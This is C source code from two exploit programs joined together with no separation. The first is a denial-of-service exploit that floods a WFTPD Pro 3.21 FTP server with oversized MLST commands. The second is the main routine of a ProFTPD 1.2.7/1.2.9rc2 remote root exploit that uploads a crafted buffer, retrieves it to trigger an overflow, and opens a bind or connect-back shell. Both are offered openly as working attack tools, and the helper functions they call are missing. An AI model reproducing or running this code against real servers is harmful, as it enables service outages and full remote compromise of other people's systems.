void main(int argc, char *argv[])
{
WSADATA wsa;
unsigned short port;
unsigned long ip;
char user[32] = "anonymous";
char pass[32] = "anonymous";
int i;
char *command = "MLST ";
SOCKET s;
int size = OVERFLOWSIZE;
printf("WFTPD Pro Server 3.21 MLST DoS Exploit\r\n");
printf("lion lion#cnhonker.net, http://www.cnhonker.com\r\n\n");
if(argc < 3)
{
printf("%s <TargetHost> <TargetPort>\r\n", argv[0]);
return;
}
WSAStartup(MAKEWORD(2,2),&wsa);
if((s=create_socket())==0)
{
printf("[-] ERROR: Create socket failed.\r\n");
return;
}
if(!client_connect(s, argv[1], atoi(argv[2])))
exit(-1);
loginftp(s, user, pass);
memset(sendbuf, 0 ,BUFFSIZE);
memcpy(sendbuf, "pasv\r\n", 6);
writebuf("Send pasv", s, sendbuf, 6);
readbuf("read", s, recvbuf, BUFFSIZE);
for(i=0;i<60;i++,size++)
{
memset(sendbuf, 0, BUFFSIZE);
memset(sendbuf, 'A', size);
memcpy(sendbuf, command, strlen(command));
sendbuf[size-2] ='\r';
sendbuf[size-1] ='\n';
printf("buff size :%d\r\n%s\r\n", strlen(sendbuf), sendbuf);
show=1;
writebuf("Send overflow buff", s, sendbuf, size);
readbuf("read", s, recvbuf, BUFFSIZE);
Sleep(500);
}
//send QUIT
memset(sendbuf,0, BUFFSIZE);
sprintf(sendbuf, "%s\r\n", "QUIT");
writebuf("Send QUIT", s, sendbuf, strlen(sendbuf));
//show=1;
//readbuf("[+] QUIT......", s, recvbuf, BUFFSIZE);
//return;
if(s)
closesocket(s);
WSACleanup();
}
main(int argc,char **argv)
{
char buffer[BIGSIZE];
char cmdbuf[SIZE];
char srvbuf[SIZE];
char filename[30];
int j,a,b,port1;
int total;
char c;
char *user=NULL;
char *pass=NULL;
char *localip=NULL;
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "d:t:u:p:l:h:o:"))!= EOF)
{
switch (c)
{
case 'd':
server=optarg;
break;
case 't':
type = atoi(optarg);
if((type > sizeof(targets)/sizeof(v)) || (type < 1))
usage(argv[0]);
break;
case 'u':
user=optarg;
break;
case 'p':
pass=optarg;
break;
case 'l':
localip=optarg;
break;
case 'h':
cbhost=optarg;
break;
case 'o':
pt=atoi(optarg) & 0xffff;
break;
default:
usage(argv[0]);
return 1;
}
}
if(server==NULL || user==NULL || pass==NULL || localip==NULL)
usage(argv[0]);
printf("@---------------------------------------------------------@\n");
printf("# proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-%s #\n",VER);
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
printf("-----------------------------------------------------------\n");
printf("[+] Ret address:%p\n",targets[type-1].ret);
if(cbhost==NULL)
bindmethod=1;
else
{
if((int)inet_addr(cbhost)==-1)
{
printf("[-] Invalid connect back host/ip\n");
exit(0);
}
bindmethod=0;
}
port1=34568; //PORT命令的时候在本地产生的一个端口.
sockfd=sockfd1=sockfd2=0;
sockfd=socket(2,1,0);
if(client_connect(sockfd,server,PORT)<0) quit();
loginftp(user,pass);
//port1=setpasv(); //get the pasv port
setport(localip,port1);
setfilename(filename,30);
setascii();
total=createbuffer(buffer,BIGSIZE,type,cbhost);
//printf("[+] buffer data size:%d\n",total);
storbuf(filename,buffer,total,port1);
//stor over, then close and reconnect
close(sockfd);
close(sockfd1);
close(sockfd2);
sockfd=socket(2,1,0);
if(client_connect(sockfd,server,PORT)<0) quit(); //reconnect
loginftp(user,pass);
setascii();
setport(localip,port1); //get the pasv port,a new one
mustread=total;
retrbuf(filename,buffer,total,port1);
readbuf("The First time read",sockfd,srvbuf,SIZE);
port1++;
setport(localip,port1);
mustread=total;
getshell=1;
retrbuf(filename,buffer,total,port1);
quit();
}
